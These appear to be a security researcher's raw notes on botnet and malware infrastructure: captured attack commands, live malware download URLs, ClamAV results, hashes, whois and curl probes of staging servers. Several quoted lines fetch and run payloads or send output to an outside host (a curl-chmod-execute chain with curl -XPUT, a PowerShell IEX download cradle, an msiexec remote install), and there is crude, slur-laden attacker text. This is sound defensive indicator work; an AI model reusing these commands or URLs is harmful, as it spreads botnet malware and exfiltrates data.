Random servers/malware located, and general notes.
Tue Aug 29 22:03:46 2023
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
library(openssl)
## Linking to: OpenSSL 3.0.8 7 Feb 2023
clamscan_hashes <- read.csv("../graphs/clamscan_hashes.csv")
malware_files <- list.files("redacted/malware", recursive=TRUE)
malware_table <- sapply(malware_files, FUN=function(x){
as.character(sha256(file(paste0("redacted/malware/", x))))
})
malware_sha256 <- data.frame(
Hash.SHA256=as.vector(malware_table),
File.Name=names(malware_table)
)
malware_df <- merge(malware_sha256, clamscan_hashes, by="Hash.SHA256")
write.csv(malware_df, "malware_scans.csv", row.names=FALSE)
http://warning.rt.ru/
http://blocked.crimea-com.net/
http://baidu.honker.info:8/86.exe
http://baidu.honker.info:8/iexplore.exe
http://baidu.honker.info:8/c64.exe
GH0STCZHBKV2EWThpYV1dUFlFWTldkeBkcGxtkb1JOZHt2cHd7fHt+a2R7e3VRS1pXW1dOXAgWdk1cCG5aSVVNX1daUwhrd3UTCHtdWFhXWlxke2x1UUtaV1tXTlwIFnZtfA
hJVkwIf1FWTFdfWwiAeAhrd3UTCHFWXE1PWklcUVdWCF9RXFAIe3dpeGQoGH0STC
msiexec /i http://avip.okblcm.co:2650/abYDuh9tfbBfVYg7up.jpg /q
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
powershell -nop -c Import-Module .\Ladon.ps1;Ladon OnlinePC
86.exe: Win.Malware.Siscos-6993581-0 FOUND
c64.exe: OK
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
b993dc56bb1fc2c463120c721e3a390e3c686a0cadb5ae8f725e8c1eb3219461 86.exe
044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763 c64.exe
a5817d0e553b0246e46ac24f15820de0523c69eaa3324631cdd257a75c671be6 iexplore.exe
86.exe: Win.Dropper.Gh0stRAT-6997745-0 FOUND
c64.exe: Win.Malware.Johnnie-6858836-0 FOUND
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
baidu.honker.info. 600 IN A 112.175.114.125
$ whois baidu.honker.info
[Querying whois.afilias.net]
[whois.afilias.net]
Malformed request.
>>> Last update of WHOIS database: 2022-03-10T06:25:39Z <<<
$ curl -i http://baidu.honker.info:8
HTTP/1.1 200 OK
Server: MyWebServer/3.6.22 Unicode (By TGY)
Date: Thu, 10 Mar 2022 04:27:54 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 19 Nov 2021 18:36:36 GMT
Content-Type: text/html
Content-Length: 4
ETag: "/:Fri, 19 Nov 2021 18:36:36 GMT"
Connection: Keep-Alive
look
194.242.56.116/mirai.x86
Discord ID embedded:
Developers: EcstasyCode#8838
Is this the same guy? (did some searching):
https://genius.com/Ecstasycode-my-botnet-lyrics
My Botnet Lyrics
- prehook (famy)
Fucking best Botnet on the world (yeah, yeah)
Fuck OVH (whoah)
- hook (famy)
My Botnet is fucking best (brother)
My Botnet is fucking best
My Botnet is fucking best
My Botnet (yeah yeah)
Fuck OVH (nanananana)
Fuck OVH (nananananana)
My Botnet is [..] fucking best (nanananananana)
Fuck OVH (nanana)
Fuck OVH (nanananana)
- end (EcstasyCode)
Fuck OVH (nananana)
My Botnet is fucking best
My Botnet is fucking' fucking' fucking' fucking' fucking' best (ay)
[...]
Genius Annotation
1 contributor
Famy and his gang have the best botnet on the world they even know how to fuck your mom
[...]
Genius Annotation
1 contributor
OVH is trash and is burning down so they say fuck OVH.
[...]
Written By
Yinuzo
Release Date
May 16, 2021
http://23.94.7.175/.s4y
s4y is a hacker and fucked you mother.
136.144.41.60:3074
[ ] arm 2022-02-10 05:19 41K
[ ] arm6 2022-02-10 05:19 44K
[ ] arm7 2022-02-10 05:19 66K
[ ] m68k 2022-02-10 05:19 99K
[ ] mips 2022-02-10 05:19 43K
[ ] mpsl 2022-02-10 05:19 43K
[ ] ppc 2022-02-10 05:19 40K
[ ] sh4 2022-02-10 05:19 83K
[ ] spc 2022-02-10 05:19 99K
[ ] x86 2022-02-10 05:19 33K
$ curl -i http://141.95.55.167/a5as4d5asd5asd4as5D/
HTTP/1.1 404 Not Found
Date: Thu, 10 Mar 2022 04:14:02 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 141.95.55.167 Port 80</address>
</body></html>
$ curl -i http://178.62.220.66/k13msmfs2/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:17:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22ec44"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://23.254.247.214
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:21:32 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
$ curl -i http://23.94.22.13/a/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:24:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 22 Feb 2022 12:42:43 GMT
ETag: "22f-5d89aaf6d4267"
Accept-Ranges: bytes
Content-Length: 559
Content-Type: text/html; charset=UTF-8
rm -rf a3; curl http://23.94.22.13/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 2.56.56.43:9832 -T a;
rm -rf a2; curl http://23.94.22.13/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 2.56.56.43:9832 -T b;
rm -rf a1; curl http://23.94.22.13/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 2.56.56.43:9832 -T c;
rm -rf a6; curl http://23.94.22.13/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 2.56.56.43:9832 -T d;
rm -rf a9; curl http://23.94.22.13/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 2.56.56.43:9832 -T e;
$ curl -i http://23.95.0.211
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:25:17 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
$ curl -i http://5.188.210.227
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:31:09 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 21 Mar 2018 19:54:01 GMT
ETag: "604d5-0-567f18d6c0840"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
$ curl -i http://185.156.72.4:47487
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4353
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.120227481937036; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
Server information HttpFileServer 2.3m
Server time: 2/8/2022 9:07:42 AM
Server uptime: (1 days) 06:27:01
Name.extension Size Timestamp Hits
[IMG] LinkOpener.exe 589.2 KB 1/24/2022 4:59:25 AM 890
inetnum: 185.156.72.0 - 185.156.72.255
netname: Interhost
country: NL
admin-c: ZAM42-RIPE
tech-c: ZAM42-RIPE
status: ASSIGNED PA
mnt-by: ru-ip84-1-mnt
created: 2020-09-24T02:25:57Z
last-modified: 2021-07-15T11:33:57Z
source: RIPE
org: ORG-VP68-RIPE
organisation: ORG-VP68-RIPE
org-name: TOV VAIZ PARTNER
org-type: OTHER
address: KIEV, ADAMA MIRKEVICHA 9 22
abuse-c: ACRO41012-RIPE
mnt-ref: ITDELUXE-MNT
mnt-by: ITDELUXE-MNT
created: 2021-05-08T18:11:03Z
last-modified: 2021-05-17T07:55:40Z
source: RIPE # Filtered
http://2.indexsinas.me:811/86.exe
http://2.indexsinas.me:811/iexplore.exe
http://2.indexsinas.me:811/c64.exe
$ curl -i http://2.indexsinas.me:811
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 3
Accept-Ranges: bytes
Server: HFS 2.3k
Set-Cookie: HFS_SID_=0.734412468969822; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
123
2.indexsinas.me. 600 IN A 211.119.107.2
2.indexsinas.me. 600 IN A 175.206.44.100
2.indexsinas.me. 600 IN A 223.171.55.115
$ whois 2.indexsinas.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:25:40Z <<<
http://360.lcy2zzx.pw:84/4445.exe
http://360.lcy2zzx.pw:84/testxmr50.exe
http://360.lcy2zzx.pw:84/home.exe
$ curl -i http://360.lcy2zzx.pw:84
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.05098782107234; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
www.google.com
360.lcy2zzx.pw. 600 IN A 114.202.175.144
$ whois 360.lcy2zzx.pw
[Querying whois.nic.pw]
[whois.nic.pw]
The queried object does not exist: DOMAIN NOT FOUND
$ curl -i http://bots.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:28:43 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
bots.infectedfam.cc. 61 IN A 23.95.0.211
$ whois bots.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "BOTS.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:24:09Z <<<
$ curl -i http://indonesias.me:9998
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Sat, 19 Mar 2022 20:03:37 GMT
Content-Length: 1237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Prohibido: acceso denegado.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Error del servidor</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Prohibido: acceso denegado.</h2>
<h3>No tiene permiso para ver este directorio o esta p�gina con las credenciales que ha proporcionado.</h3>
</fieldset></div>
</div>
</body>
</html>
indonesias.me. 300 IN A 137.74.81.148
indonesias.me. 300 IN A 39.108.155.143
indonesias.me. 300 IN A 222.186.137.38
indonesias.me. 300 IN A 113.200.207.107
indonesias.me. 300 IN A 211.149.222.28
indonesias.me. 300 IN A 120.76.245.218
$ whois indonesias.me
[Querying whois.nic.me]
[whois.nic.me]
Domain Name: INDONESIAS.ME
Registry Domain ID: D425500000049923590-AGRS
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2021-07-22T22:24:19Z
Creation Date: 2018-07-22T06:56:51Z
Registry Expiry Date: 2022-07-22T06:56:51Z
Registrar Registration Expiration Date:
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hubei/xiaochang/fengshan
Registrant Country: CN
Name Server: RITA.NS.CLOUDFLARE.COM
Name Server: KAI.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-03-10T06:20:14Z <<<
$ curl -i http://ip.ws.126.net
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 10 Mar 2022 04:29:49 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Vary: Accept-Encoding
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
ip.ws.126.net. 2444 IN CNAME ipservice.163.com.
ipservice.163.com. 107 IN A 59.111.181.52
$ whois ip.ws.126.net
[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]
No match for domain "IP.WS.126.NET".
>>> Last update of whois database: 2022-03-10T06:23:50Z <<<
kevincnc.madafaka.me. 1800 IN A 178.62.220.66
$ whois kevincnc.madafaka.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:22:24Z <<<
$ curl -i http://kevincnc.madafaka.me
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:30:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22f02c"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
scan.infectedfam.cc. 300 IN A 23.95.0.211
$ whois scan.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "SCAN.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:21:55Z <<<
$ curl -i http://scan.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:31:19 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
$ curl -i http://106.246.224.219
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2022 11:07:36 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 17 Sep 2020 04:59:56 GMT
ETag: "2409b3-695-5af7b41623a17"
Accept-Ranges: bytes
Content-Length: 1685
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>(주)디즈넷</title>
<meta name="generator" content="Namo WebEditor v6.0">
</head>
<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<p> </p>
<p> <img src="img4.gif" border="0"></p>
<p><a href="http://www.diznet.co.kr" target="_self"><img src="img9.gif" border="0"></a></p>
<p><a href="http://ezsso.bizmeka.com"><img src="img2.gif" border="0"></a></p>
<p><a href="http://www.diznet.kr:5500"><img src="img3.gif" border="0"></a></p>
<p> </p>
<p align="left"> 이동할 사이트를 클릭하세요.</p>
<p align="left"> <img src="img5.gif" border="0"></p>
</body>
</html>
jswl.jdaili.xyz/jaws
$ curl -i jswl.jdaili.xyz/jaws
HTTP/1.1 404 Not Found
Date: Thu, 17 Mar 2022 20:05:51 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jaws was not found on this server.</p>
</body></html>
$ whois jswl.jdaili.xyz
[Querying whois.nic.xyz]
[whois.nic.xyz]
The queried object does not exist: DOMAIN NOT FOUND
$ dig jswl.jdaili.xyz
jswl.jdaili.xyz. 542 IN A 209.141.33.141
$ whois 209.141.33.141
NetRange: 209.141.32.0 - 209.141.63.255
CIDR: 209.141.32.0/19
NetName: PONYNET-04
NetHandle: NET-209-141-32-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2011-01-27
Updated: 2012-03-25
Ref: https://rdap.arin.net/registry/ip/209.141.32.0
OrgName: FranTech Solutions
OrgId: SYNDI-5
Address: 1621 Central Ave
City: Cheyenne
StateProv: WY
PostalCode: 82001
Country: US
RegDate: 2010-07-21
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/SYNDI-5
SHORELINE BOTNET THA REAL SHIT NIGGA
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-03-13 16:05 85K
[ ] arm5 2022-03-13 16:05 61K
[ ] arm6 2022-03-13 16:05 93K
[ ] arm7 2022-03-13 16:05 161K
[ ] i686 2022-03-13 16:05 81K
[ ] m68k 2022-03-13 16:05 82K
[ ] mips 2022-03-13 16:05 75K
[ ] mpsl 2022-03-13 16:05 106K
[ ] ppc 2022-03-13 16:05 77K
[ ] sh4 2022-03-13 16:05 74K
[ ] spc 2022-03-13 16:05 86K
[ ] x86 2022-03-13 16:05 73K
$ curl -i http://212.192.246.30/bins/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:40:45 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3162
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /bins</title>
</head>
<body>
<h1>Index of /bins</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="arm">arm</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 85K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="arm5">arm5</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 61K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="arm6">arm6</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 93K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="arm7">arm7</a> </td><td align="right">2022-03-13 16:05 </td><td align="right">161K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="i686">i686</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 81K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="m68k">m68k</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 82K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="mips">mips</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 75K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="mpsl">mpsl</a> </td><td align="right">2022-03-13 16:05 </td><td align="right">106K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="ppc">ppc</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 77K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="sh4">sh4</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 74K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="spc">spc</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 86K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="x86">x86</a> </td><td align="right">2022-03-13 16:05 </td><td align="right"> 73K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
inetnum: 212.192.244.0 - 212.192.247.255
netname: Serverion
country: NL
org: ORG-DCB8-RIPE
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
status: ASSIGNED PA
mnt-by: RELCOMGROUP-EXT-MNT
created: 2020-10-06T20:25:28Z
last-modified: 2021-05-28T13:59:06Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
mnt-ref: mnt-nl-descapital-1
mnt-ref: RELCOMGROUP-EXT-MNT
mnt-ref: FREENET-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: mnt-nl-descapital-1
created: 2020-03-17T15:00:52Z
last-modified: 2022-03-15T10:56:08Z
source: RIPE # Filtered
mnt-ref: AZERONLINE-MNT
mnt-ref: interlir-mnt
$ curl -i http://31.210.20.109
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 10 Mar 2022 22:21:40 GMT
ETag: "2-5d9e4a361fb00"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html; charset=UTF-8
X
$ curl -i http://31.210.20.109/a/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:33 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 2186
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /a</title>
</head>
<body>
<h1>Index of /a</h1>
<ul><li><a href="/"> Parent Directory</a></li>
<li><a href="76d32be0.sh"> 76d32be0.sh</a></li>
<li><a href="b/"> b/</a></li>
<li><a href="bot.arc"> bot.arc</a></li>
<li><a href="bot.arm"> bot.arm</a></li>
<li><a href="bot.arm5"> bot.arm5</a></li>
<li><a href="bot.arm6"> bot.arm6</a></li>
<li><a href="bot.arm7"> bot.arm7</a></li>
<li><a href="bot.i686"> bot.i686</a></li>
<li><a href="bot.m68k"> bot.m68k</a></li>
<li><a href="bot.mips"> bot.mips</a></li>
<li><a href="bot.mpsl"> bot.mpsl</a></li>
<li><a href="bot.ppc"> bot.ppc</a></li>
<li><a href="bot.rm7"> bot.rm7</a></li>
<li><a href="bot.sh4"> bot.sh4</a></li>
<li><a href="bot.spc"> bot.spc</a></li>
<li><a href="bot.x86"> bot.x86</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arc"> db0fa4b8db0333367e9bda3ab68b8042.arc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm"> db0fa4b8db0333367e9bda3ab68b8042.arm</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm5"> db0fa4b8db0333367e9bda3ab68b8042.arm5</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm6"> db0fa4b8db0333367e9bda3ab68b8042.arm6</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm7"> db0fa4b8db0333367e9bda3ab68b8042.arm7</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.i686"> db0fa4b8db0333367e9bda3ab68b8042.i686</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.m68k"> db0fa4b8db0333367e9bda3ab68b8042.m68k</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mips"> db0fa4b8db0333367e9bda3ab68b8042.mips</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mpsl"> db0fa4b8db0333367e9bda3ab68b8042.mpsl</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.ppc"> db0fa4b8db0333367e9bda3ab68b8042.ppc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.sh4"> db0fa4b8db0333367e9bda3ab68b8042.sh4</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.spc"> db0fa4b8db0333367e9bda3ab68b8042.spc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.x86"> db0fa4b8db0333367e9bda3ab68b8042.x86</a></li>
<li><a href="wget.sh"> wget.sh</a></li>
</ul>
</body></html>
inetnum: 45.90.160.0 - 45.90.160.255
netname: FR-SAPINET-20190625
country: FR
org: ORG-SS1190-RIPE
admin-c: TA8040-RIPE
tech-c: TA8040-RIPE
status: ALLOCATED PA
mnt-by: SAPINET-MNT
mnt-by: RIPE-NCC-HM-MNT
created: 2021-10-27T08:12:36Z
last-modified: 2021-10-27T08:12:36Z
source: RIPE
organisation: ORG-SS1190-RIPE
org-name: Sapinet SAS
country: FR
org-type: LIR
address: 65 rue de la Croix
address: 92000
address: Nanterre
address: FRANCE
phone: +33783049305
admin-c: TA8040-RIPE
tech-c: TA8040-RIPE
abuse-c: AR63279-RIPE
mnt-ref: SAPINET-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: SAPINET-MNT
created: 2021-06-08T10:29:40Z
last-modified: 2021-06-08T10:29:40Z
source: RIPE # Filtered
$ curl -i http://45.90.160.54/
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:06:38 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] onion002.arm 2022-04-06 01:30 24K
[ ] onion002.arm5 2022-04-06 01:30 22K
[ ] onion002.arm6 2022-04-06 01:30 29K
[ ] onion002.arm7 2022-04-06 01:30 48K
[ ] onion002.m68k 2022-04-06 01:30 52K
[ ] onion002.mips 2022-04-06 01:30 26K
[ ] onion002.mpsl 2022-04-06 01:30 27K
[ ] onion002.ppc 2022-04-06 01:30 23K
[ ] onion002.sh4 2022-04-06 01:30 50K
[ ] onion002.spc 2022-04-06 01:30 59K
[ ] onion002.x86 2022-04-06 01:30 24K
══════════════════════════════════════════════════════════════
lftp 45.90.160.54
lftp 45.90.160.54:~> ls
-rwxr-xr-x 1 0 0 25004 Apr 06 01:30 onion002.arm
-rwxr-xr-x 1 0 0 22132 Apr 06 01:30 onion002.arm5
-rwxr-xr-x 1 0 0 29464 Apr 06 01:30 onion002.arm6
-rwxr-xr-x 1 0 0 48688 Apr 06 01:30 onion002.arm7
-rwxr-xr-x 1 0 0 53052 Apr 06 01:30 onion002.m68k
-rwxr-xr-x 1 0 0 26168 Apr 06 01:30 onion002.mips
-rwxr-xr-x 1 0 0 27244 Apr 06 01:30 onion002.mpsl
-rwxr-xr-x 1 0 0 23944 Apr 06 01:30 onion002.ppc
-rwxr-xr-x 1 0 0 51584 Apr 06 01:30 onion002.sh4
-rwxr-xr-x 1 0 0 60412 Apr 06 01:30 onion002.spc
-rwxr-xr-x 1 0 0 24728 Apr 06 01:30 onion002.x86
-rw-r--r-- 1 0 0 2007 Apr 06 01:39 sora1.sh
$ curl -i http://45.90.160.54/bins/
HTTP/1.1 200 OK
Date: Sat, 09 Apr 2022 08:05:28 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3053
Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /bins</title>
</head>
<body>
<h1>Index of /bins</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
